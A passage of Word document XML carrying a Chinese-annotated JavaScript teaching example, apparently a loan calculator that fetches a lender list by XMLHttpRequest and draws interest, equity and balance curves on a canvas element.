        <w:t>getLenders(amount,apr,years,zipcode){//</w:t>
      </w:r>
      <w:r>
        <w:t>如果浏览器不支持</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象，则退出</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(!window.XMLHttpRequest)return;//</w:t>
      </w:r>
      <w:r>
        <w:t>找到要显示放贷人列表的元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var ad=document.getElementById("lenders");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(!ad)return;//</w:t>
      </w:r>
      <w:r>
        <w:t>如果返回为空，则退出</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>将用户的输入数据进行</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>编码，并作为查询参数附加在</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>里</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var url="getLenders.php"+//</w:t>
      </w:r>
      <w:r>
        <w:t>处理数据的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>地</w:t>
      </w:r>
      <w:r>
        <w:t>址</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"?amt="+encodeURIComponent(amount)+//</w:t>
      </w:r>
      <w:r>
        <w:t>使用查询串中的数据</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>＆</w:t>
      </w:r>
      <w:r>
        <w:t>apr="+encodeURIComponent(apr)+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>＆</w:t>
      </w:r>
      <w:r>
        <w:t>yrs="+encodeURIComponent(years)+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>＆</w:t>
      </w:r>
      <w:r>
        <w:t>zip="+encodeURIComponent(zipcode);//</w:t>
      </w:r>
      <w:r>
        <w:t>通过</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象来提取返回数据</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var req=new XMLHttpRequest();//</w:t>
      </w:r>
      <w:r>
        <w:t>发起一个新的请求</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>req.open("GET",url);//</w:t>
      </w:r>
      <w:r>
        <w:t>通过</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>发起一个</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> GET</w:t>
      </w:r>
      <w:r>
        <w:t>请求</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>req.send(null);//</w:t>
      </w:r>
      <w:r>
        <w:t>不带任何正文发送这个请求</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>在返回数据之前，注册了一个事件处理函数，这个处理函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>将会在服务器的响应返回至客户端的时候调用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这种异步编程模型在客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中是非常常见的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>req.onreadystatechange=function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(req.readyState==4</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>req.status==200){//</w:t>
      </w:r>
      <w:r>
        <w:t>如果代码运行到这里，说明我们得到了一个合法且完整的</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>响应</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var response=req.responseTe</w:t>
      </w:r>
      <w:r>
        <w:t>xt;//HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>响应是以字符串的形式呈现的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>var lenders=JSON.parse(response);//</w:t>
      </w:r>
      <w:r>
        <w:t>将其解析为</w:t>
      </w:r>
      <w:r>
        <w:t>JS</w:t>
      </w:r>
      <w:r>
        <w:t>数组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>将数组中的放贷人对象转换为</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>字符串形式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var list="";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>lenders.length;i++){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>list+="</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>li</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>a href='"+lenders[i].url+"'</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>lenders[i].name+"</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/a</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>将数据在</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>元素中呈现出来</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>ad.innerHTML="</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>ul</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"+list+"</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>ul</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w: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在</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素中用图表展示月度贷款余额、利息和资产收益</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果不传入参数的话，则清空之前的图表数据</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function chart(principal,interest,monthly,payments){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var graph=document.getElementById("graph");//</w:t>
      </w:r>
      <w:r>
        <w:t>得到＜</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>graph.width=graph.width;//</w:t>
      </w:r>
      <w:r>
        <w:t>用一种巧妙的手法清除并重置画布</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果不传入参数，或者浏览器不支持画布，则直接返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(arguments.length==0||!graph.getContext)return;//</w:t>
      </w:r>
      <w:r>
        <w:t>获得画布元素的</w:t>
      </w:r>
      <w:r>
        <w:t>"context"</w:t>
      </w:r>
      <w:r>
        <w:t>对象，这个对象定义了一组绘画</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var g=graph.getContext("2d");//</w:t>
      </w:r>
      <w:r>
        <w:t>所有的绘画操作都将基于这个对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var width=graph.width,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>height=graph.height;//</w:t>
      </w:r>
      <w:r>
        <w:t>获得画布大小</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这里的函数作用是将付款数字和美元数据转换为像素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function paymentToX(n){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return n*width/payment</w:t>
      </w:r>
      <w:r>
        <w:t>s;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function amountToY(a){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return height-(a*height/(monthly*payments*1.05));}//</w:t>
      </w:r>
      <w:r>
        <w:t>付款数据是一条从</w:t>
      </w:r>
      <w:r>
        <w:t>(0,0)</w:t>
      </w:r>
      <w:r>
        <w:t>到</w:t>
      </w:r>
      <w:r>
        <w:t>(payments,monthly*payments)</w:t>
      </w:r>
      <w:r>
        <w:t>的直线</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>g.moveTo(paymentToX(0),amountToY(0));//</w:t>
      </w:r>
      <w:r>
        <w:t>从左下方开始</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>g.lineTo(paymentToX(payments),//</w:t>
      </w:r>
      <w:r>
        <w:t>绘至右上方</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>amountToY(monthly*payments));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>g.lineTo(paymentToX(payments),amountToY(0));//</w:t>
      </w:r>
      <w:r>
        <w:t>再至右下方</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>g.closePath();//</w:t>
      </w:r>
      <w:r>
        <w:t>将结尾连接至开头</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>g.fillStyle="#f88";//</w:t>
      </w:r>
      <w:r>
        <w:t>亮红色</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>g.fill();//</w:t>
      </w:r>
      <w:r>
        <w:t>填充矩形</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>g.font="bold 12px sans-serif";//</w:t>
      </w:r>
      <w:r>
        <w:t>定义一种字体</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>g.fillText("Total Interest Payments",20,20);//</w:t>
      </w:r>
      <w:r>
        <w:t>将文字绘制到图例中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>很多资产数据并不是线性的，很难将其反映至图表中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var equity=0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>g.b</w:t>
      </w:r>
      <w:r>
        <w:t>eginPath();//</w:t>
      </w:r>
      <w:r>
        <w:t>开始绘制新图形</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>g.moveTo(paymentToX(0),amountToY(0));//</w:t>
      </w:r>
      <w:r>
        <w:t>从左下方开始</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var p=1;p</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>=payments;p++){//</w:t>
      </w:r>
      <w:r>
        <w:t>计算出每一笔赔付的利息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var thisMonthsInterest=(principal-equity)*interest;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>equity+=(monthly-thisMonthsInterest);//</w:t>
      </w:r>
      <w:r>
        <w:t>得到资产额</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>g.lineTo(paymentToX(p),amountToY(equity));//</w:t>
      </w:r>
      <w:r>
        <w:t>将数据绘制到画布上</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>g.lineTo(paymentToX(payments),amountToY(0));//</w:t>
      </w:r>
      <w:r>
        <w:t>将数据线绘制至</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>轴</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>g.closePath();//</w:t>
      </w:r>
      <w:r>
        <w:t>将线条结尾连接至线条开头</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>g.fillStyle="green";//</w:t>
      </w:r>
      <w:r>
        <w:t>使用绿色绘制图形</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>g.fill();//</w:t>
      </w:r>
      <w:r>
        <w:t>曲线之下的部分均填充</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>g.fillText("Total Equity",20,35);//</w:t>
      </w:r>
      <w:r>
        <w:t>文本颜色设置为绿色</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>再次循环，余额数据显示为黑色粗</w:t>
      </w:r>
      <w:r>
        <w:t>线条</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var bal=principal;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>g.beginPath();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>g.moveTo(paymentToX(0),amountToY(bal));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var p=1;p</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>=payments;p++){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var thisMonthsInterest=bal*interest;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>bal-=(monthly-thisMonthsInterest);//</w:t>
      </w:r>
      <w:r>
        <w:t>得到资产额</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>g.lineTo(paymentToX(p),amountToY(bal));//</w:t>
      </w:r>
      <w:r>
        <w:t>将直线连接至某点</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>g.lineWidth=3;//</w:t>
      </w:r>
      <w:r>
        <w:t>将直</w:t>
      </w:r>
      <w:r>
        <w:t>线宽度加粗</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>g.stroke();//</w:t>
      </w:r>
      <w:r>
        <w:t>绘制余额的曲线</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>g.fillStyle="black";//</w:t>
      </w:r>
      <w:r>
        <w:t>使用黑色字体</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>g.fillText("Loan Balance",20,50);//</w:t>
      </w:r>
      <w:r>
        <w:t>图例文字</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>将年度数据在</w:t>
      </w:r>
      <w:r>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:t>轴做标记</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>g.textAlign="center";//</w:t>
      </w:r>
      <w:r>
        <w:t>文字居中对齐</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var y=amountToY(0);//Y</w:t>
      </w:r>
      <w:r>
        <w:t>坐标设为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var year=1;year*12</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>=payments;year++){//</w:t>
      </w:r>
      <w:r>
        <w:t>遍历每年</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var x=paymentToX(year*12);//</w:t>
      </w:r>
      <w:r>
        <w:t>计算标记位置</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>g.fillRect(x-0.5,y-3,1,3);//</w:t>
      </w:r>
      <w:r>
        <w:t>开始绘制标记</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(year==1)g.fillText("Year",x,y-5);//</w:t>
      </w:r>
      <w:r>
        <w:t>在坐标轴做标记</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(year%5==0</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>year*12!==payments)//</w:t>
      </w:r>
      <w:r>
        <w:t>每</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>年的数据</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>g.fillText(String(year),x,y-5);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>将赔付数额标记在右边界</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>g.textAlign="right";//</w:t>
      </w:r>
      <w:r>
        <w:t>文字右对齐</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
